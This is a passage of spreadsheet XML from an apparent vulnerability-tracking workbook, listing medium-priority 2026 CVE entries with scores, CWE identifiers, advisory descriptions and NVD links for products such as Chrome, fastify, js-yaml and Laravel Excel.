          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="2863">
      <c r="A2863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="C2863" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2863" s="5" t="inlineStr"/>
      <c r="F2863" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2863" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H286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863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2863" s="5" t="inlineStr"/>
      <c r="K2863" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2863" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="2864">
      <c r="A2864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84219</t>
        </is>
      </c>
      <c r="C2864" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2864" s="5" t="inlineStr"/>
      <c r="F2864" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2864" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2864" s="5" t="inlineStr"/>
      <c r="I2864" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2864" s="5" t="inlineStr"/>
      <c r="K2864" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2864" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not hold back every spelling of the HTML entities it decodes when rendering, allowing unauthenticated users to store JavaScript in a comment which then runs in the session of anyone viewing a page that displays it, including an administrator, and on every page of the site when its header or footer is built to show comments.</t>
        </is>
      </c>
      <c r="M2864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84219</t>
        </is>
      </c>
    </row>
    <row r="2865">
      <c r="A2865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84374</t>
        </is>
      </c>
      <c r="C2865" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2865" s="5" t="inlineStr"/>
      <c r="F2865" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2865" s="5" t="inlineStr"/>
      <c r="H2865" s="5" t="inlineStr"/>
      <c r="I2865" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2865" s="5" t="inlineStr"/>
      <c r="K2865" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L2865" s="5" t="inlineStr">
        <is>
          <t>Laravel Excel provides supercharged Excel exports and imports in Laravel. From 3.1.8 until 3.1.70, in src/Files/Disk.php the Maatwebsite\Excel\Files\Disk::copy() method resolves the caller-controlled $destination supplied through Excel::store(), $export-&gt;store(), or storeExcel() against the process working directory with realpath() instead of the configured filesystem disk. If the path names an existing writable file, Disk::copy() opens it with fopen() in rb+ mode and uses stream_copy_to_stream(), bypassing Flysystem path confinement and allowing an attacker whose application input controls the export path to overwrite arbitrary existing files with export content. The rb+ behavior creates a non-truncating overwrite and trailing bytes when the new export is shorter, and overwriting an executable PHP file can lead to remote code execution. This issue is fixed in version 3.1.70.</t>
        </is>
      </c>
      <c r="M2865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84374</t>
        </is>
      </c>
    </row>
    <row r="2866">
      <c r="A2866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="C2866" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2866" s="5" t="inlineStr"/>
      <c r="F2866" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2866" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2866" s="5" t="inlineStr"/>
      <c r="I2866" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2866" s="5" t="inlineStr"/>
      <c r="K2866" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L2866" s="5" t="inlineStr">
        <is>
          <t>js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15.2 and 4.3.2, maxTotalMergeKeys in lib/js-yaml/loader.js and lib/loader.js does not count empty mapping sources while processing the merge key &lt;&lt;. An attacker can alias a large sequence of empty mappings into many merge targets, causing O(N * K) processing while totalMergeKeys remains unchanged and the configured resource limit is never reached. A relatively small YAML document can therefore cause prolonged CPU consumption in applications that parse untrusted YAML, and merge processing is enabled by default on these release lines. This issue is fixed in versions 3.15.2 and 4.3.2.</t>
        </is>
      </c>
      <c r="M2866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="2867">
      <c r="A2867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="C2867" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2867" s="5" t="inlineStr"/>
      <c r="F2867" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2867" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2867" s="5" t="inlineStr"/>
      <c r="I2867" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2867" s="5" t="inlineStr"/>
      <c r="K2867" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L2867" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.12.0, the HTTPX2 content decoders in src/httpx2/httpx2/_decoders.py fully inflate each gzip, deflate, br, or zstd network chunk before iter_bytes() or aiter_bytes() yields bounded pieces to the application. A 64 KiB compressed chunk can expand to approximately 64 MiB in one intermediate allocation, so an attacker-controlled or compromised server can cause severe memory pressure or out-of-memory process termination even when the application streams the response. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M2867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="2868">
      <c r="A2868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84428</t>
        </is>
      </c>
      <c r="C2868" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2868" s="5" t="inlineStr"/>
      <c r="F2868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2868" s="5" t="inlineStr"/>
      <c r="H2868" s="5" t="inlineStr"/>
      <c r="I2868" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2868" s="5" t="inlineStr"/>
      <c r="K2868" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L2868" s="5" t="inlineStr">
        <is>
          <t>fastify versions before 5.12.2 implement the case-insensitive nature of HTTP header names by lowercasing names in a route's header schema before compiling it, but the transformation is incomplete: it lowercases the properties keys and the root-level required array, and does not lowercase the trigger and dependent names inside the JSON Schema Draft 7 dependencies keyword. Because Node stores request header names in lowercase, a canonical-case dependency such as requiring an authentication header whenever a privileged-mode header is present never matches, and the presence assertion is silently skipped. An unauthenticated remote client can therefore send the header that activates a privileged branch while omitting the header the dependency was meant to require, bypassing the conditional check. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M2868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84428</t>
        </is>
      </c>
    </row>
    <row r="2869">
      <c r="A2869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="C2869" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2869" s="5" t="inlineStr"/>
      <c r="F2869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2869" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2869" s="5" t="inlineStr"/>
      <c r="I2869" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2869" s="5" t="inlineStr"/>
      <c r="K2869" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2869" s="5" t="inlineStr">
        <is>
          <t>fastify versions before 5.12.2 decide whether to compile a request schema based on JavaScript truthiness, but JSON Schema Draft 7 defines the boolean false as a valid schema that rejects every instance. When an application assigns false to a route's body, querystring, params, or headers schema to deny all input, fastify treats it as a missing schema, compiles no validator, and runs the route handler on any request. An unauthenticated remote client can therefore reach a handler that a valid deny-all schema was intended to make unreachable, a complete validation bypass that can lead to unauthorized state changes or execution of disabled operations. Users should upgrade to fastify 5.12.2 or later.</t>
        </is>
      </c>
      <c r="M2869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="2870">
      <c r="A2870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84821</t>
        </is>
      </c>
      <c r="C2870" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2870" s="5" t="inlineStr"/>
      <c r="F2870" s="5" t="inlineStr"/>
      <c r="G2870" s="5" t="inlineStr"/>
      <c r="H2870" s="5" t="inlineStr"/>
      <c r="I2870" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2870" s="5" t="inlineStr"/>
      <c r="K2870" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2870" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WP Fast Total Search &lt;= 1.82.284 versions.</t>
        </is>
      </c>
      <c r="M2870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84821</t>
        </is>
      </c>
    </row>
    <row r="2871">
      <c r="A2871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85045</t>
        </is>
      </c>
      <c r="C2871" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2871" s="5" t="inlineStr"/>
      <c r="F2871" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2871" s="5" t="inlineStr"/>
      <c r="H2871" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2871" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2871" s="5" t="inlineStr"/>
      <c r="K2871" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2871" s="5" t="inlineStr">
        <is>
          <t>Race condition in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M2871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85045</t>
        </is>
      </c>
    </row>
    <row r="2872">
      <c r="A2872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85124</t>
        </is>
      </c>
      <c r="C2872" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2872" s="5" t="inlineStr"/>
      <c r="F2872" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2872" s="5" t="inlineStr"/>
      <c r="H2872" s="5" t="inlineStr">
        <is>
          <t>fastify:fastify\/http-proxy</t>
        </is>
      </c>
      <c r="I2872" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2872" s="5" t="inlineStr"/>
      <c r="K2872" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2872" s="5" t="inlineStr">
        <is>
          <t>@fastify/http-proxy versions before 11.6.2 do not validate proxied HTTP request paths for backslash based dot-segments before forwarding them to the configured upstream. The plain HTTP request handler skips the destination validation that the WebSocket path performs, and the underlying reply-from library only rejects forward-slash traversal, so a request containing backslash dot-segments can escape the boundary set by the prefix and rewritePrefix options. An unauthenticated network attacker can use this to reach upstream paths that were meant to stay hidden behind the proxy, resulting in disclosure of internal endpoints. This is a path traversal issue (CWE-22). Users should upgrade to @fastify/http-proxy 11.6.2 or later.</t>
        </is>
      </c>
      <c r="M2872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85124</t>
        </is>
      </c>
    </row>
    <row r="2873">
      <c r="A2873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85150</t>
        </is>
      </c>
      <c r="C2873" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2873" s="5" t="inlineStr"/>
      <c r="F2873" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2873" s="5" t="inlineStr"/>
      <c r="H2873" s="5" t="inlineStr"/>
      <c r="I2873" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2873" s="5" t="inlineStr"/>
      <c r="K2873" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2873" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference flaw was found in GStreamer's RTSP support library. The vulnerability occurs while parsing an Authorization or WWW-Authenticate header that uses Digest authentication. Specially crafted whitespace placement around a parameter's terminator can cause an internal length calculation to underflow, leading to a crash of the process parsing the header. On an RTSP server this can be triggered by a remote, unauthenticated attacker sending a single malformed request when the server has authentication enabled; the same flaw can also be triggered against an RTSP client by a malicious or compromised RTSP server. Successful exploitation results in a denial of service (application crash) and has no confirmed impact on confidentiality or integrity.</t>
        </is>
      </c>
      <c r="M2873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85150</t>
        </is>
      </c>
    </row>
    <row r="2874">
      <c r="A2874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85400</t>
        </is>
      </c>
      <c r="C2874" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2874" s="5" t="inlineStr"/>
      <c r="F2874" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2874" s="5" t="inlineStr"/>
      <c r="H2874" s="5" t="inlineStr"/>
      <c r="I2874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2874" s="5" t="inlineStr"/>
      <c r="K2874" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-862</t>
        </is>
      </c>
      <c r="L2874" s="5" t="inlineStr">
        <is>
          <t>Backend administrators without system maintainer privileges were able to schedule any of the configuration:read, configuration:set, and configuration:show commands. This allowed them to modify arbitrary system configuration, which is normally limited to system maintainers. As a consequence, this allowed them, for example, to gain system maintainer privileges or cause a denial of service. Exploiting this vulnerability requires an administrator-level backend user account. This issue affects TYPO3 CMS versions 14.2.0-14.3.6.</t>
        </is>
      </c>
      <c r="M2874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t>
        </is>
      </c>
    </row>
    <row r="2875">
      <c r="A2875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85505</t>
        </is>
      </c>
      <c r="C2875" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2875" s="5" t="inlineStr"/>
      <c r="F2875" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2875" s="5" t="inlineStr"/>
      <c r="H2875" s="5" t="inlineStr"/>
      <c r="I2875" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2875" s="5" t="inlineStr"/>
      <c r="K2875" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2875" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer over-read in ipmi_oem_fujitsu_get_sel_entry_long_text in ipmi-oem/ipmi-oem-fujitsu.c when a BMC provides a short response, a different vulnerability than CVE-2026-50031 (which has different affected versions).</t>
        </is>
      </c>
      <c r="M2875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85505</t>
        </is>
      </c>
    </row>
    <row r="2876">
      <c r="A2876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86093</t>
        </is>
      </c>
      <c r="C2876" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2876" s="5" t="inlineStr"/>
      <c r="F2876" s="5" t="inlineStr"/>
      <c r="G2876" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H2876" s="5" t="inlineStr"/>
      <c r="I2876" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2876" s="5" t="inlineStr"/>
      <c r="K2876" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2876"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M2876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86093</t>
        </is>
      </c>
    </row>
    <row r="2877">
      <c r="A2877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86287</t>
        </is>
      </c>
      <c r="C2877" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2877" s="5" t="inlineStr"/>
      <c r="F2877" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2877" s="5" t="inlineStr"/>
      <c r="H2877" s="5" t="inlineStr"/>
      <c r="I2877" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2877" s="5" t="inlineStr"/>
      <c r="K2877" s="5" t="inlineStr">
        <is>
          <t>CWE-1287</t>
        </is>
      </c>
      <c r="L2877" s="5" t="inlineStr">
        <is>
          <t>Net::IP::LPM versions before 1.12 for Perl accept malformed prefix lengths.
Non-numeric and non-ASCII prefix lengths are accepted and treated as 0. Integers over 31 bits are silently truncated.  A single malformed mask will poison the lookup table.
The result is that the lookup will silently succeed for every address. An allow-list will allow every address, and a deny-list will block every address.</t>
        </is>
      </c>
      <c r="M2877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86287</t>
        </is>
      </c>
    </row>
    <row r="2878">
      <c r="A2878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86711</t>
        </is>
      </c>
      <c r="C2878" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2878" s="5" t="inlineStr"/>
      <c r="F2878" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2878" s="5" t="inlineStr"/>
      <c r="H2878" s="5" t="inlineStr"/>
      <c r="I2878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2878" s="5" t="inlineStr"/>
      <c r="K2878" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="L2878" s="5" t="inlineStr">
        <is>
          <t>electerm before 5.3.15 exposes 40+ main-process functions through an unvalidated Electron IPC handler with no function-name allowlist or sender validation. Renderer-side script execution can invoke openFileWithEditor and other functions with arbitrary arguments to execute system commands in the main process.</t>
        </is>
      </c>
      <c r="M2878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t>
        </is>
      </c>
    </row>
    <row r="2879">
      <c r="A2879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87011</t>
        </is>
      </c>
      <c r="C2879" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2879" s="5" t="inlineStr"/>
      <c r="F2879" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2879" s="5" t="inlineStr"/>
      <c r="H2879" s="5" t="inlineStr"/>
      <c r="I2879" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2879" s="5" t="inlineStr"/>
      <c r="K2879" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-770</t>
        </is>
      </c>
      <c r="L2879" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.1, the unauthenticated POST /oauth/backchannel-logout handler in backend/open_webui/utils/oauth.py fetched the OIDC discovery document and signing keys before validating a submitted logout token. Each request repeated uncached network fetches, and the signing-key lookup blocked the async event loop, so requests carrying invalid tokens could stall the single-worker instance and amplify traffic to the identity provider when ENABLE_OAUTH_BACKCHANNEL_LOGOUT was enabled. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M2879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87011</t>
        </is>
      </c>
    </row>
    <row r="2880">
      <c r="A2880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87431</t>
        </is>
      </c>
      <c r="C2880" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2880" s="5" t="inlineStr"/>
      <c r="F2880" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2880" s="5" t="inlineStr"/>
      <c r="H2880" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2880" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2880" s="5" t="inlineStr"/>
      <c r="K2880" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2880" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M2880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87431</t>
        </is>
      </c>
    </row>
    <row r="2881">
      <c r="A2881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87450</t>
        </is>
      </c>
      <c r="C2881" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2881" s="5" t="inlineStr"/>
      <c r="F2881" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2881" s="5" t="inlineStr"/>
      <c r="H2881" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2881" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2881" s="5" t="inlineStr"/>
      <c r="K2881" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2881" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Permissions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M2881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87450</t>
        </is>
      </c>
    </row>
    <row r="2882">
      <c r="A2882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87601</t>
        </is>
      </c>
      <c r="C2882" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2882" s="5" t="inlineStr"/>
      <c r="F2882" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2882" s="5" t="inlineStr"/>
      <c r="H2882" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I2882" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2882" s="5" t="inlineStr"/>
      <c r="K2882" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2882" s="5" t="inlineStr">
        <is>
          <t>Race condition in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M2882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87601</t>
        </is>
      </c>
    </row>
    <row r="2883">
      <c r="A2883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87734</t>
        </is>
      </c>
      <c r="C2883" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2883" s="5" t="inlineStr"/>
      <c r="F2883" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2883" s="5" t="inlineStr"/>
      <c r="H2883" s="5" t="inlineStr"/>
      <c r="I2883" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2883" s="5" t="inlineStr"/>
      <c r="K2883" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="L2883" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the utcp package before 0.0.6 for OCaml. Out-of-order segment reassembly allows remote denial of service.</t>
        </is>
      </c>
      <c r="M2883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87734</t>
        </is>
      </c>
    </row>
